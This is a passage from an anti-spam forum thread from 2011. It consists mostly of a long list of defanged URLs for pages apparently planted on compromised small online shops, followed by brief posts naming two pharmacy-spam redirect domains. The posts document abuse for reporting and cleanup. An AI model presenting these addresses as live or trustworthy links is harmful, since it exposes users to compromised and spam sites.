hXXp://www.hfctechnics.hu/flags/launch/presence.html
hXXp://www.hkfunny.com/images/team.html
hXXp://www.hongkong128.com/7-print.com/images/piss.html
hXXp://www.hongkong-server.com/shop/images/figure.html
hXXp://www.horseheaven.pl/download/repeat/shot.html
hXXp://www.hotice.com.br/images/match.html
hXXp://www.hotmeltnozzles.com/images/categories/expect/current.html
hXXp://www.i-bags.com.au/images/sandwich.html
hXXp://www.ibmsimorgh.com/shop/images/quite.html
hXXp://www.imagenet.net.au/images/associate.html
hXXp://www.imagoo.es/catalogo/images/matrox/operate/shepherd.html
hXXp://www.imkershop.at/oscommerce/catalog/<beep>.html
hXXp://www.immobiliarelogiudice.it/logiudice/admin/includes/studio/reveal.html
hXXp://www.imperial24.com/images/unless.html
hXXp://www.imssacv.com.mx/images/according.html
hXXp://www.indruck.at/screenshots/what/whose.html
hXXp://www.indusvalleydesigns.com/shop/catalog/images/cigar.html
hXXp://www.innovaseals.com.br/catalogo/images/airport.html
hXXp://www.interial24.pl/tmp/rack/swing.html
hXXp://www.internationalfitness.it/admin/includes/system/expect.html
hXXp://www.iphigenia.ch/shop/images/default/concrete/structure.html
hXXp://www.iranharraj.com/images/young.html
hXXp://www.iranus.net/images/worth/sake/advantage.html
hXXp://www.itsclothesonline.com.au/images/follow.html
hXXp://www.izakka.com.tw/images/firmly.html
hXXp://www.jackstevenwholesale.com/flash/sixty/possess.html
hXXp://www.ja-komano.jp/catalog/admin/includes/patient/clothes.html
hXXp://www.jangadavendasweb.com.br/images/commit.html
hXXp://www.japanautosperformances.fr/images/banners/bedroom/rush.html
hXXp://www.jasiek888.livenet.pl/sklep/images/scan.html
hXXp://www.jerecyclebags.com.my/catalog/images/troop.html
hXXp://www.joespowersupplies.com/images/inform.html
hXXp://www.jorinsports.nl/catalog/lightbox/fuel/help.html
hXXp://www.jpower8.cz/logs/follow/corpse.html
hXXp://www.jsmotor.biz/images/icons/briefly/month.html
hXXp://www.just-printer-toners.co.uk/images/snarl.html
hXXp://www.juwelierquaak.nl/images/angrily.html
hXXp://www.k-9bikejogger.com/cart/admin/includes/answer/kill.html
hXXp://www.kadovoordeel.nu/images/ankle.html
hXXp://www.kampanyashop.com/images/default/security/haul.html
hXXp://www.karninaboutique.com/images/itself.html
hXXp://www.katdeals.com/Catalog/admin/admin/quietly/right.html
hXXp://www.katookthai-shop.com/images/default/shadow/introduce.html
hXXp://www.kermanbox.com/images/future.html
hXXp://www.kerzenlicht24.de/images/alone.html
hXXp://www.keyseven.net/loja/surprise.html
hXXp://www.kharidoonline.com/images/previous.html
hXXp://www.khonsiam.nl/shop/images/water.html
hXXp://www.kianpg.com/catalog/images/comment.html
hXXp://www.kidsatoffice.com/js/tree/freak.html
hXXp://www.kimcorp.fr/medias/chill/planet.html
hXXp://www.kingsbottle.com/images/slide.html
hXXp://www.kitobra.com.br/images/hint.html
hXXp://www.k-lefevre.com/catalog/images/suite.html
hXXp://www.kochfit.de/images/thrust.html
hXXp://www.kopenviainternet.com/images/background.html
hXXp://www.ktperformance.net/catalog/ext/lane/sort.html
hXXp://www.kuvertdruck.at/ext/county/only.html
hXXp://www.kwantungdragon.nl/pages/steam/request.html
hXXp://www.larbreadelices.fr/boutique/ext/honey/sand.html
hXXp://www.lasvegastourdesk.com/bend.html
hXXp://www.lavenasexy.com/shop/ext/pile/fuel.html
hXXp://www.lawnuk.com/images/horrible.html
hXXp://www.legiongames.co.uk/images/land.html
hXXp://www.lekeriet.no/admin/includes/height/easy.html
hXXp://www.lequotibau.fr/images/file/claw/weekend.html
hXXp://www.lestore.com.tw/images/senior.html
hXXp://www.librasbysoraya.com.br/loja/images/elevator.html
hXXp://www.lifestyleanimals.co.nz/catalog/images/parent.html
hXXp://www.lifestylehomewares.com/images/amber.html
hXXp://www.lijanecosmetics.com/shop/images/social.html
hXXp://www.lilonesconsignments.com/cart/admin/includes/hold/neck.html
hXXp://www.linkarv.com/loja/images/skip.html
hXXp://www.liquidlead-art.com/admin/backups/close/everybody.html
hXXp://www.lojavirtualchucar.com.br/images/frighten.html
hXXp://www.lsiimobiliaria.com.br/images/reason.html
hXXp://www.ltitape.com/catalog/images/booth.html
hXXp://www.luxurythemagazine.com/images/worst/Jesus.html
hXXp://www.magnetic-frankfurt.de/shop/ext/statue/special.html
hXXp://www.maisbela.com.br/images/serve.html
hXXp://www.makesimple4u.com/images/categories/tense/bunch.html
hXXp://www.malagaelectronica.es/tienda/bring.html
hXXp://www.manoloblahnikschuhe.de/pub/certain/dare.html
hXXp://www.manutencaoautomotiva.com/loja/gentle.html
hXXp://www.margueritte.be/images/mail/manner/nightmare.html
hXXp://www.masqjuegos.com.mx/catalogo/images/last.html
hXXp://www.materialesavenida.com.mx/tienda/images/widen.html
hXXp://www.mavigulticaret.com/images/banners/point/taste.html
hXXp://www.medicalfurniture.ie/images/introduce.html
hXXp://www.megwares.com.my/catalog/images/neat.html
hXXp://www.meraitstore.com/images/hunch.html
hXXp://www.mercadojujuy.com/images/warehouse.html
hXXp://www.merserwis.pl/sklep2/images/pretend.html
hXXp://www.messerclub.com/images/hurl.html
hXXp://www.micro-intervention.eu/images/case.html
hXXp://www.mijootour.com/osc/images/wallet.html
hXXp://www.mineralexposer.it/admin/includes/patch/seek.html
hXXp://www.misterrocker.com/loja/admin/stride/vault.html
hXXp://www.mizan.com.mx/images/default/vision/soul.html
hXXp://www.mjbspecialityextracts.com/catalog/images/shower.html
hXXp://www.modaplanetshop.com/images/shock.html
hXXp://www.modellismouliano.com/admin/includes/hurt/tunnel.html
hXXp://www.modellmanufaktur.com/zen-cart/admin/includes/conceal/speed.html
hXXp://www.monacor.djpro.pl/pub/again/technician.html
hXXp://www.monetykolekcjonerskie.net/ext/front/reporter.html
hXXp://www.mortan.cz/oldweb2/bowl/energy.html
hXXp://www.mrloverxport.com/catalog/images/sierra/gift/companion.html
hXXp://www.mte.com.mx/sitio/js/wing/name.html
hXXp://www.mundopiercing.com/admin/includes/weak/flag.html
hXXp://www.museobonsai.it/shop/admin/includes/summer/desk.html
hXXp://www.musicorner.info/admin/includes/shield/rule.html
hXXp://www.musicvillageonline.net/admin/images/professor/struggle.html
hXXp://www.music-world.it/shop/admin/includes/goddamn/float.html
hXXp://www.mycam2006.co.nz/images/promotion/necessary/political.html
hXXp://www.myexpresscartridge.co.uk/download/slump/street.html
hXXp://www.mykitchensupermart.com/images/search.html
hXXp://www.mysli.sk/images/hello.html
hXXp://www.naranjomusic.com/admin/includes/tent/nerve.html
hXXp://www.naszpies.pl/admin/includes/pull/lawn.html
hXXp://www.naturallynurtured.com/boutique/admin/_notes/neither/wipe.html
hXXp://www.netwerkcomputers.nl/images/part.html
hXXp://www.neuroinduccion.net/images/plate.html
hXXp://www.newsstore.com.br/loja2/boleto/squint/pilot.html
hXXp://www.nikkiespanties.com/images/queen.html
hXXp://www.nmi-csg.com/images/matrox/carve/engage.html
hXXp://www.nuovoscreen.com/catalog/pub/overhead/attempt.html
hXXp://www.obrazy.com.pl/images/dekory/drink/write.html
hXXp://www.odzywki.katowice.pl/images/interview.html
hXXp://www.ofertasenergy.com/images/weapon.html
hXXp://www.oggieskralenwinkel.nl/images/gate.html
hXXp://www.oncompras.com/images/roll.html
hXXp://www.onixinstrumentosmusicais.com.br/images/tilt.html
hXXp://www.online-kuechenkauf.de/images/rabbit.html
hXXp://www.optigestion.org/optigestion/shop1/images/spirit.html
hXXp://www.opusdf.com.mx/images/forget.html
hXXp://www.orlandobarstore.authsafe.com/images/hide.html
hXXp://www.oscommerce.arnlweb.com/images/banners/sexual/<beep>.html
hXXp://www.overdrivemc.it/negozio/admin/includes/horizon/shape.html
hXXp://www.oxy.nl/plugins/ball/nervously.html
hXXp://www.oxyderma.nl/libraries/fear/reason.html
hXXp://www.paddingtonpublicschool.com/store/images/spider.html
hXXp://www.pageantfancydress.co.uk/images/default/scrape/firmly.html
hXXp://www.partsstore24.com/shop/images/gt_interactive/visit/resist.html
hXXp://www.payless-electronics.com/images/complex.html
hXXp://www.pbqach.info/extensions/stomach/wander.html
hXXp://www.pbqadk.info/extensions/future/relieve.html
hXXp://www.pbqaie.info/extensions/indeed/land.html
hXXp://www.pbqalu.info/extensions/strong/even.html
hXXp://www.pbqanl.info/extensions/beer/poke.html
hXXp://www.pbqase.info/extensions/necessary/gonna.html
hXXp://www.pbqauk.info/extensions/lightning/play.html
hXXp://www.performance-parts.eu/images/onto.html
hXXp://www.persianasbest.com.mx/tienda/images/gt_interactive/break/swarm.html
hXXp://www.petsilk.pl/sklep/cgi-bin/credit/iron.html
hXXp://www.pfarmaciacriscione.com/shop/admin/includes/news/pierce.html
hXXp://www.pharmamik.nazwa.pl/esklep/ext/never/major.html
hXXp://www.phdrugstore.com/images/shave.html
hXXp://www.philatelie-philippe.fr/images/divers/friendly/boot.html
hXXp://www.phurly.com/images/banners/friend/besides.html
hXXp://www.pianetacasaarredamenti.it/cgi-bin/peace/instantly.html
hXXp://www.plussizerim.com/ext/alive/basement.html
hXXp://www.podereseducaobrasil.com/loja2/images/chill.html
hXXp://www.polobloom.com/images/slowly.html
hXXp://www.polycyberusa.com/catalog/images/infobox/examine/sneak.html
hXXp://www.pontodasantenas.net/images/mail.html
hXXp://www.poshmoda.us/images/sort.html
hXXp://www.powerrepairs.com.au/images/scan.html
hXXp://www.printedtshirtsxchange.com.au/su_autoinstaller/freedom/tunnel.html
hXXp://www.produtosdemaquiagem.com.br/images/guide.html
hXXp://www.profigramshop.hu/fonts/hundred/black.html
hXXp://www.promotiile.ro/images/lick.html
hXXp://www.protecshop.net/osc/images/infobox/bust/sack.html
hXXp://www.proyou.it/cat/admin/includes/again/tell.html
hXXp://www.psicoterapiaholistica.org/loja/admin/assignment/skin.html
hXXp://www.pufminder.com/images/blink.html
hXXp://www.puntocarta.it/admin/includes/expose/sonny.html
hXXp://www.pupistoys.com/shop/admin/includes/photo/closet.html
hXXp://www.purchase7.com/images/maitreyii/blaze/press.html
hXXp://www.purplefx.co.nz/catalog/images/structure.html
hXXp://www.quantacor.com.br/atendimento/distant/regard.html
hXXp://www.quickpack.net/images/remote.html
hXXp://www.r17.pl/ext/small/anger.html
hXXp://www.rareamerica.com/admin/includes/tile/stand.html
hXXp://www.readyeyes.com/images/dvd/stern/pose.html
hXXp://www.redorchidstudio.com/store/admin/includes/human/bolt.html
hXXp://www.reflectionsofthesea.com/catalog/images/mail/street/horn.html
hXXp://www.regalosyglobos.es/ext/choose/body.html
hXXp://www.rena.shop.pl/images/attendant.html
hXXp://www.reviziechevrolet.ro/images/mari/cold/talk.html
hXXp://www.robotpeople.cz/logs/clothing/bloody.html
hXXp://www.rolandmpx-90.com/store/images/engage.html
hXXp://www.rosepresenteseflores.com/loja/images/shed.html
hXXp://www.sab.rs/catalog/images/fresh.html
hXXp://www.sadiaco.com/images/infobox/lunch/afford.html
hXXp://www.sakarigraphics.com/images/handle.html
hXXp://www.salonesoterico.com/tienda/images/pain.html
hXXp://www.samniumgallery.com/images/default/refer/book.html
hXXp://www.sandramodas.com.br/loja/images/advantage.html
hXXp://www.santi.com.es/admin/includes/solid/ceiling.html
hXXp://www.saymex.com/images/step.html
hXXp://www.schoenenverkoop.nl/images/gain.html
hXXp://www.schoenthal.biz/shop/images/powered/bride/quickly.html
hXXp://www.schuerer.cc/cliff/embarrass/reveal.html
hXXp://www.schule-christiani.de/images/downtown.html
hXXp://www.sdec.co.uk/images/policeman.html
hXXp://www.secure-euro.com/~bbair/images/exactly.html
hXXp://www.selmabordados.com.br/boletos/pressure/board.html
hXXp://www.sementinhababy.com.br/loja/kneel.html
hXXp://www.seminar-service-nastasi.de/shop/images/perfectly.html
hXXp://www.sensationalscraps.com/catalog/images/default/attitude/silly.html
hXXp://www.sensations24.com/images/policeman.html
hXXp://www.sevier.nl/images/press.html
hXXp://www.sexrea.se/doc/scale/eighteen.html
hXXp://www.shadedrose.co.uk/images/banners/lunch/afford.html
hXXp://www.shop4tronic.de/catalog/images/hall.html
hXXp://www.shopcba.com.br/loja/images/increase.html
hXXp://www.shopivoir.com/images/ease.html
hXXp://www.shotcrete.bz/admin/includes/effort/ground.html
hXXp://www.showtime4bfg.com/images/debris.html
hXXp://www.sicopesystem.com.br/bailartebrasil/lojavirtual/admin/your/just.html
hXXp://www.silverjewellerydesigners.com/images/punch.html
hXXp://www.sisteme-antiefractie.ro/images/banners/piano/filter.html
hXXp://www.sklep.imexpiechota.pl/admin/includes/target/accident.html
hXXp://www.sklep.itmts.com/images/infobox/bottom/coat.html
hXXp://www.sklep.propter.com.pl/images/default/direct/thumb.html
hXXp://www.sklepc.pl/v2/crane/every.html
hXXp://www.smile-rice.com/images/icons/weight/expert.html
hXXp://www.snsdesignz.adsl24.co.uk/sns/catalog/ext/master/height.html
hXXp://www.sobelcobvba.be/images/nearly.html
hXXp://www.softown.it/ecom/admin/includes/pavement/total.html
hXXp://www.softseductions.co.za/images/default/find/grand.html
hXXp://www.soleilbresil.com/images/clothes.html
hXXp://www.solucionesmg.com/catalog/images/shell.html
hXXp://www.so-siso.com/admin/backups/squeeze/crush.html
hXXp://www.sparewheels.com.au/images/bank.html
hXXp://www.sportattivo.it/shop/ext/less/nail.html
hXXp://www.stampmyfeet.com/zen/admin/includes/comfort/starling.html
hXXp://www.start-mebel.ru/shop/images/banners/guard/bury.html
hXXp://www.startrekgiftcards.com/images/schedule.html
hXXp://www.stockinpromozioni.com/admin/includes/snap/pound.html
hXXp://www.stuffedpretzel.com/store/admin/includes/beast/wail.html
hXXp://www.stylettto.com/images/somewhat.html
hXXp://www.sublimark.com/new/world/church.html
hXXp://www.survivalnmore.com/images/thumbs/table/hungry.html
hXXp://www.sweet69sexshop.com/tienda-bk/images/gt_interactive/science/self.html
hXXp://www.sweetmannursery.com/catalog/images/speak.html
hXXp://www.takingyouonline.com/ecom/home/catalog/images/appear.html
hXXp://www.tauret.cz/banner/flame/trigger.html
hXXp://www.tea.com.pl/css/link/east.html
hXXp://www.technologieseasy.com/errors/shade/involve.html
hXXp://www.techsoft.it/zendemo/admin/includes/refer/they.html
hXXp://www.tecsolutionsinc.com/catalog/images/bump.html
hXXp://www.tee-und-gewuerzparadies.de/shop/images/intend.html
hXXp://www.tegelunie-online.nl/images/everyone.html
hXXp://www.tejiendoarte.org/tienda/images/default/frighten/during.html
hXXp://www.telepienso.net/images/know.html
hXXp://www.terraminerales.com/tienda/admin/includes/seize/language.html
hXXp://www.thebodyshoppe.net/language/earth/navy.html
hXXp://www.theguivs.com.br/images/attach.html
hXXp://www.thejewelrycheststore.com/images/mail/whistle/joker.html
hXXp://www.the-nursery-shop.co.uk/images/medium/pleasant/priest.html
hXXp://www.thomassaboanhaenger.com/pub/else/route.html
hXXp://www.thomassabocharmclub.org/pub/court/whoever.html
hXXp://www.thyristor.it/admin/includes/penny/bride.html
hXXp://www.tiendadiabetes.com.mx/pub/according/shadow.html
hXXp://www.timbrecarimbosartesanais.com.br/loja/admin/evil/handle.html
hXXp://www.top5.com.tw/images/lounge.html
hXXp://www.tougei-taian.com/modules/zox/admin/includes/handsome/shut.html
hXXp://www.tradefixdirect.com/images/rattle.html
hXXp://www.tranhtheuviet.com/images/default/conference/cool.html
hXXp://www.truereligionjeansguenstig.com/pub/curse/terrify.html
hXXp://www.truereligionjeansguenstig.com/pub/professor/life.html
hXXp://www.truereligionjeansguenstig.net/skins/nowhere/vision.html
hXXp://www.tshirtsexy.com/_private/first/trick.html
hXXp://www.ttcomputer.cz/forest.html
hXXp://www.tumbleart.com/catalog/admin/includes/bell/golden.html
hXXp://www.turkeyapparel.com/11c46b175497ec/chest/slope.html
hXXp://www.tvsatshopping.com.br/lojavirtual/myself.html
hXXp://www.tycash.com.tw/images/retreat.html
hXXp://www.upomineczek.pl/sklep/images/deal.html
hXXp://www.ush.ro/files/answer/always.html
hXXp://www.uszipcodelists.com/images/size.html
hXXp://www.vap-nabytek.cz/wap/late/mistake.html
hXXp://www.vazen.org/images/banners/thick/twelve.html
hXXp://www.vendasrio.com.br/images/silk.html
hXXp://www.venusadvertising.ro/images/icons/easily/there.html
hXXp://www.versatile-supplies.co.uk/shop/images/cross.html
hXXp://www.vh-international.com.hk/images/charge/palm/calmly.html
hXXp://www.vilabloom.com.br/loja/osc/images/battle.html
hXXp://www.vinzoffice.com.my/catalog/images/floor.html
hXXp://www.vitadyn.com/admin/includes/practice/trick.html
hXXp://www.walter-kommunikation.de/shop/images/dvd/recall/lonely.html
hXXp://www.watercoolersuk.com/images/.tmp/sail/social.html
hXXp://www.weblis.com.br/loja/images/breathing.html
hXXp://www.webstersbutchersblocks.co.uk/images/explosion.html
hXXp://www.webswapper.com/images/infobox/indeed/rocket.html
hXXp://www.weltraum.pl/admin/balance/explosion.html
hXXp://www.wembleyparking.net/static/spare/human.html
hXXp://www.wipes.com.sg/images/lunge.html
hXXp://www.wolftrancedesign.com/images/definitely.html
hXXp://www.xn--kchenexperte-dlb.ch/images/square.html
hXXp://www.yumeisoap.com/images/banners/clever/response.html
hXXp://www.zacavi.com.br/images/icons/weight/eighty.html
hXXp://www.zier.cl/tienda/images/evidence.html
hXXp://www.zorus.org/shop/catalog/images/meal.html
hXXp://www.zree.com.pl/zreeLIGHTING/download/easy/casually.html
hXXp://www2.coolsofa.com/images/detective.html
hXXp://wyngatezone.com/store/images/banner/shelter/twice.html
hXXp://wysox.net/wysoxincludes/attitude/admit.html
hXXp://wzimporttoys.com/images/terminal.html
hXXp://xcluziveeyez.com/modules/street/structure.html
hXXp://xmaxelectro.com/images/icons/furious/porch.html
hXXp://xn--jrna-loa.biz/wp-includes/discuss/belong.html
hXXp://x-tremcar.net/phpmyvisites/recently/stranger.html
hXXp://xv.subaru.ua/huge/dollar/heaven.html
hXXp://YANASeniorsSociety.org/_vti_cnf/flesh/gesture.html
hXXp://z7chin.com/images/thick.html
hXXp://zaino.pl/includes/ugly/march.html
hXXp://zegarki24.info.pl/library.html
hXXp://zundapp-partsonline.com/images/default/disgust/pound.html
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby AlphaCentauri » Mon Jan 31, 2011 12:50 am

A lot of those sites have been shut down, probably because the spam was reported to their hosts. Meanwhile the target domains are alive and well.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Compromised hosts

Postby Red Dwarf » Mon Jan 31, 2011 2:08 am

That is true.
A lot of IP blocking is also going on, making it look like the sites are cleaned. Some redirection targets are
sensitivetabletrxpills.net
tabletswellbeingpills.com
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am

PreviousNext

Return to Botnets, Hijacks and Hacking

Who is online

Users browsing this forum: No registered users and 3 guests

cron